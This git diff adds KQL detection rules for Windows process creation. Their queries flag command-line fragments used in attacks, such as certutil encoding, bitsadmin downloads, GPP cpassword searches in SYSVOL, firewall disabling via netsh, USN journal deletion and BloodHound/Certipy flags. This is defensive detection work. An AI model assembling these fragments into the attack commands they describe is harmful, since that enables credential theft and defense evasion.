+| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Local\\Temp\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "$Recycle.Bin") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/file_recovery_from_backup_via_wbadmin_exe.kql
new file mode 100644
index 00000000..cd73bab1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_recovery_from_backup_via_wbadmin_exe.kql
@@ -0,0 +1,11 @@
+// Title: File Recovery From Backup Via Wbadmin.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-05-10
+// Level: medium
+// Description: Detects the recovery of files from backups via "wbadmin.exe".
+// Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_with_suspicious_extension_downloaded_via_bitsadmin.kql b/KQL/rules/windows/process_creation/file_with_suspicious_extension_downloaded_via_bitsadmin.kql
new file mode 100644
index 00000000..4ffd38e6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_with_suspicious_extension_downloaded_via_bitsadmin.kql
@@ -0,0 +1,10 @@
+// Title: File With Suspicious Extension Downloaded Via Bitsadmin
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file with a suspicious extension
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains ".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/files_added_to_an_archive_using_rar_exe.kql b/KQL/rules/windows/process_creation/files_added_to_an_archive_using_rar_exe.kql
new file mode 100644
index 00000000..2c0d4451
--- /dev/null
+++ b/KQL/rules/windows/process_creation/files_added_to_an_archive_using_rar_exe.kql
@@ -0,0 +1,12 @@
+// Title: Files Added To An Archive Using Rar.EXE
+// Author: Timur Zinniatullin, E.M. Anhaus, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+//   - Highly likely if rar is a default archiver in the monitored environment.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " a " and FolderPath endswith "\\rar.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/filter_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/windows/process_creation/filter_driver_unloaded_via_fltmc_exe.kql
new file mode 100644
index 00000000..2af0dd67
--- /dev/null
+++ b/KQL/rules/windows/process_creation/filter_driver_unloaded_via_fltmc_exe.kql
@@ -0,0 +1,10 @@
+// Title: Filter Driver Unloaded Via Fltmc.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-13
+// Level: medium
+// Description: Detect filter driver unloading activity via fltmc.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "unload" and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")) and (not((((ProcessCommandLine endswith "unload rtp_filesystem_filter" or ProcessCommandLine endswith "unload rtp_filter") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\") and InitiatingProcessFolderPath endswith "\\endpoint-protection-installer-x64.tmp") or (ProcessCommandLine endswith "unload DFMFilter" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\ManageEngine\\uems_agent\\bin\\dcfaservice64.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/findstr_gpp_passwords.kql b/KQL/rules/windows/process_creation/findstr_gpp_passwords.kql
new file mode 100644
index 00000000..1e6dc976
--- /dev/null
+++ b/KQL/rules/windows/process_creation/findstr_gpp_passwords.kql
@@ -0,0 +1,10 @@
+// Title: Findstr GPP Passwords
+// Author: frack113
+// Date: 2021-12-27
+// Level: high
+// Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cpassword" and ProcessCommandLine contains "\\sysvol\\" and ProcessCommandLine contains ".xml") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/findstr_launching_lnk_file.kql b/KQL/rules/windows/process_creation/findstr_launching_lnk_file.kql
new file mode 100644
index 00000000..193ef27c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/findstr_launching_lnk_file.kql
@@ -0,0 +1,10 @@
+// Title: Findstr Launching .lnk File
+// Author: Trent Liffick
+// Date: 2020-05-01
+// Level: medium
+// Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1202, attack.t1027.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".lnk" or ProcessCommandLine endswith ".lnk\"" or ProcessCommandLine endswith ".lnk'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/finger_exe_execution.kql b/KQL/rules/windows/process_creation/finger_exe_execution.kql
new file mode 100644
index 00000000..c5a6bfc0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/finger_exe_execution.kql
@@ -0,0 +1,14 @@
+// Title: Finger.EXE Execution
+// Author: Florian Roth (Nextron Systems), omkar72, oscd.community
+// Date: 2021-02-24
+// Level: high
+// Description: Detects execution of the "finger.exe" utility.
+// Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.
+// Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+//   - Admin activity (unclear what they do nowadays with finger.exe)
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "finger.exe" or FolderPath endswith "\\finger.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/firewall_configuration_discovery_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_configuration_discovery_via_netsh_exe.kql
new file mode 100644
index 00000000..5d1c1c84
--- /dev/null
+++ b/KQL/rules/windows/process_creation/firewall_configuration_discovery_via_netsh_exe.kql
@@ -0,0 +1,12 @@
+// Title: Firewall Configuration Discovery Via Netsh.EXE
+// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
+// Date: 2021-12-07
+// Level: low
+// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+//   - Administrative activity
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "config " or ProcessCommandLine contains "state " or ProcessCommandLine contains "rule " or ProcessCommandLine contains "name=all") and (ProcessCommandLine contains "netsh" and ProcessCommandLine contains "show " and ProcessCommandLine contains "firewall ")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/firewall_disabled_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_disabled_via_netsh_exe.kql
new file mode 100644
index 00000000..926ed3d7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/firewall_disabled_via_netsh_exe.kql
@@ -0,0 +1,12 @@
+// Title: Firewall Disabled via Netsh.EXE
+// Author: Fatih Sirin
+// Date: 2019-11-01
+// Level: medium
+// Description: Detects netsh commands that turns off the Windows firewall
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004, attack.s0108
+// False Positives:
+//   - Legitimate administration activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "opmode" and ProcessCommandLine contains "disable") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "state" and ProcessCommandLine contains "off"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/firewall_rule_deleted_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_rule_deleted_via_netsh_exe.kql
new file mode 100644
index 00000000..7eff5b8e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/firewall_rule_deleted_via_netsh_exe.kql
@@ -0,0 +1,13 @@
+// Title: Firewall Rule Deleted Via Netsh.EXE
+// Author: frack113
+// Date: 2022-08-14
+// Level: medium
+// Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+//   - Legitimate administration activity
+//   - Software installations and removal
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "delete ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall delete rule name=\"Avast Antivirus Admin Client\"" and InitiatingProcessFolderPath endswith "\\instup.exe") or (ProcessCommandLine contains "name=Dropbox" and InitiatingProcessFolderPath endswith "\\Dropbox.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/firewall_rule_update_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_rule_update_via_netsh_exe.kql
new file mode 100644
index 00000000..36d47e3b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/firewall_rule_update_via_netsh_exe.kql
@@ -0,0 +1,13 @@
+// Title: Firewall Rule Update Via Netsh.EXE
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-18
+// Level: medium
+// Description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Legitimate administration activity
+//   - Software installations and removal
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " firewall " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql b/KQL/rules/windows/process_creation/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql
new file mode 100644
index 00000000..43dbbbac
--- /dev/null
+++ b/KQL/rules/windows/process_creation/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql
@@ -0,0 +1,11 @@
+// Title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2021-07-20
+// Level: medium
+// Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.
+// An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1074.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath $env:TEMP") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains ":\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/forfiles_command_execution.kql b/KQL/rules/windows/process_creation/forfiles_command_execution.kql
new file mode 100644
index 00000000..cbd7225c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/forfiles_command_execution.kql
@@ -0,0 +1,14 @@
+// Title: Forfiles Command Execution
+// Author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2022-06-14
+// Level: medium
+// Description: Detects the execution of "forfiles" with the "/c" flag.
+// While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.
+// Can be used to bypass application whitelisting.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Legitimate use via a batch script or by an administrator.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") and (FolderPath endswith "\\forfiles.exe" or ProcessVersionInfoOriginalFileName =~ "forfiles.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/forfiles_exe_child_process_masquerading.kql b/KQL/rules/windows/process_creation/forfiles_exe_child_process_masquerading.kql
new file mode 100644
index 00000000..4d64af1a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/forfiles_exe_child_process_masquerading.kql
@@ -0,0 +1,10 @@
+// Title: Forfiles.EXE Child Process Masquerading
+// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
+// Date: 2024-01-05
+// Level: high
+// Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where (ProcessCommandLine startswith "/c echo \"" and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine endswith ".exe" or InitiatingProcessCommandLine endswith ".exe\"")) and (not(((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") and InitiatingProcessFolderPath endswith "\\forfiles.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/fsutil_drive_enumeration.kql b/KQL/rules/windows/process_creation/fsutil_drive_enumeration.kql
new file mode 100644
index 00000000..8031cc61
--- /dev/null
+++ b/KQL/rules/windows/process_creation/fsutil_drive_enumeration.kql
@@ -0,0 +1,12 @@
+// Title: Fsutil Drive Enumeration
+// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
+// Date: 2022-03-29
+// Level: low
+// Description: Attackers may leverage fsutil to enumerated connected drives.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1120
+// False Positives:
+//   - Certain software or administrative tasks may trigger false positives.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "drives" and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/fsutil_suspicious_invocation.kql b/KQL/rules/windows/process_creation/fsutil_suspicious_invocation.kql
new file mode 100644
index 00000000..982a1eb1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/fsutil_suspicious_invocation.kql
@@ -0,0 +1,14 @@
+// Title: Fsutil Suspicious Invocation
+// Author: Ecco, E.M. Anhaus, oscd.community
+// Date: 2019-09-26
+// Level: high
+// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).
+// Might be used by ransomwares during the attack (seen by NotPetya and others).
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1485
+// False Positives:
+//   - Admin activity
+//   - Scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql b/KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql
new file mode 100644
index 00000000..b43de036
--- /dev/null
+++ b/KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql
@@ -0,0 +1,18 @@
+// Title: Github Self-Hosted Runner Execution
+// Author: Daniel Koifman (KoifSec)
+// Date: 2025-11-29
+// Level: medium
+// Description: Detects GitHub self-hosted runners executing workflows on local infrastructure that could be abused for persistence and code execution.
+// Shai-Hulud is an npm supply chain worm targeting CI/CD environments.
+// It installs runners on compromised systems to maintain access after credential theft, leveraging their access to secrets and internal networks.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102.002, attack.t1071
+// False Positives:
+//   - Legitimate GitHub self-hosted runner installations on designated CI/CD infrastructure
+//   - Authorized runner deployments by DevOps/Platform teams following change management
+//   - Scheduled runner updates or reconfigurations on existing build agents
+//   - Self-hosted runners that follow expected/known naming patterns
+//   - Installation via expected/known configuration management tools (reflected mostly as parent process name)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "spawnclient" and (FolderPath endswith "\\Runner.Worker.exe" or ProcessVersionInfoOriginalFileName =~ "Runner.Worker.dll")) or ((ProcessCommandLine contains "run" or ProcessCommandLine contains "configure") and (FolderPath endswith "\\Runner.Listener.exe" or ProcessVersionInfoOriginalFileName =~ "Runner.Listener.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/gpresult_display_group_policy_information.kql b/KQL/rules/windows/process_creation/gpresult_display_group_policy_information.kql
new file mode 100644
index 00000000..13b61f03
--- /dev/null
+++ b/KQL/rules/windows/process_creation/gpresult_display_group_policy_information.kql
@@ -0,0 +1,10 @@
+// Title: Gpresult Display Group Policy Information
+// Author: frack113
+// Date: 2022-05-01
+// Level: medium
+// Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1615
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/z" or ProcessCommandLine contains "/v") and FolderPath endswith "\\gpresult.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/gpscript_execution.kql b/KQL/rules/windows/process_creation/gpscript_execution.kql
new file mode 100644
index 00000000..cb2b5d51
--- /dev/null
+++ b/KQL/rules/windows/process_creation/gpscript_execution.kql
@@ -0,0 +1,12 @@
+// Title: Gpscript Execution
+// Author: frack113
+// Date: 2022-05-16
+// Level: medium
+// Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate uses of logon scripts distributed via group policy
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /logon" or ProcessCommandLine contains " /startup") and (FolderPath endswith "\\gpscript.exe" or ProcessVersionInfoOriginalFileName =~ "GPSCRIPT.EXE")) and (not(InitiatingProcessCommandLine =~ "C:\\windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/greedy_file_deletion_using_del.kql b/KQL/rules/windows/process_creation/greedy_file_deletion_using_del.kql
new file mode 100644
index 00000000..96e5944c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/greedy_file_deletion_using_del.kql
@@ -0,0 +1,10 @@
+// Title: Greedy File Deletion Using Del
+// Author: frack113 , X__Junior (Nextron Systems)
+// Date: 2021-12-02
+// Level: medium
+// Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains "\\*.au3" or ProcessCommandLine contains "\\*.dll" or ProcessCommandLine contains "\\*.exe" or ProcessCommandLine contains "\\*.js") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/group_membership_reconnaissance_via_whoami_exe.kql b/KQL/rules/windows/process_creation/group_membership_reconnaissance_via_whoami_exe.kql
new file mode 100644
index 00000000..fae44daf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/group_membership_reconnaissance_via_whoami_exe.kql
@@ -0,0 +1,10 @@
+// Title: Group Membership Reconnaissance Via Whoami.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: medium
+// Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /groups" or ProcessCommandLine contains " -groups") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/gzip_archive_decode_via_powershell.kql b/KQL/rules/windows/process_creation/gzip_archive_decode_via_powershell.kql
new file mode 100644
index 00000000..746643db
--- /dev/null
+++ b/KQL/rules/windows/process_creation/gzip_archive_decode_via_powershell.kql
@@ -0,0 +1,12 @@
+// Title: Gzip Archive Decode Via PowerShell
+// Author: Hieu Tran
+// Date: 2023-03-13
+// Level: medium
+// Description: Detects attempts of decoding encoded Gzip archives via PowerShell.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1132.001
+// False Positives:
+//   - Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "GZipStream" and ProcessCommandLine contains "::Decompress"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_adcspwn_execution.kql b/KQL/rules/windows/process_creation/hacktool_adcspwn_execution.kql
new file mode 100644
index 00000000..48597c07
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_adcspwn_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - ADCSPwn Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-31
+// Level: high
+// Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.t1557.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " --adcs " and ProcessCommandLine contains " --port "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_bloodhound_sharphound_execution.kql b/KQL/rules/windows/process_creation/hacktool_bloodhound_sharphound_execution.kql
new file mode 100644
index 00000000..2b40985d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_bloodhound_sharphound_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Bloodhound/Sharphound Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-12-20
+// Level: high
+// Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
+// False Positives:
+//   - Other programs that use these command line option and accepts an 'All' parameter
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -CollectionMethod All " or ProcessCommandLine contains " --CollectionMethods Session " or ProcessCommandLine contains " --Loop --Loopduration " or ProcessCommandLine contains " --PortScanTimeout " or ProcessCommandLine contains ".exe -c All -d " or ProcessCommandLine contains "Invoke-Bloodhound" or ProcessCommandLine contains "Get-BloodHoundData") or (ProcessCommandLine contains " -JsonFolder " and ProcessCommandLine contains " -ZipFileName ") or (ProcessCommandLine contains " DCOnly " and ProcessCommandLine contains " --NoSaveCache ") or (ProcessVersionInfoProductName contains "SharpHound" or ProcessVersionInfoFileDescription contains "SharpHound" or (ProcessVersionInfoCompanyName contains "SpecterOps" or ProcessVersionInfoCompanyName contains "evil corp") or (FolderPath contains "\\Bloodhound.exe" or FolderPath contains "\\SharpHound.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_certify_execution.kql b/KQL/rules/windows/process_creation/hacktool_certify_execution.kql
new file mode 100644
index 00000000..d76e0175
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_certify_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Certify Execution
+// Author: pH-T (Nextron Systems)
+// Date: 2023-04-17
+// Level: high
+// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1649
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/hacktool_certipy_execution.kql b/KQL/rules/windows/process_creation/hacktool_certipy_execution.kql
new file mode 100644
index 00000000..36cbf366
--- /dev/null
+++ b/KQL/rules/windows/process_creation/hacktool_certipy_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Certipy Execution
+// Author: pH-T (Nextron Systems), Sittikorn Sangrattanapitak
+// Date: 2023-04-17
+// Level: high
+// Description: Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1649
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " account " or ProcessCommandLine contains " auth " or ProcessCommandLine contains " cert " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " ptt " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow " or ProcessCommandLine contains " template ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -template" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list"))
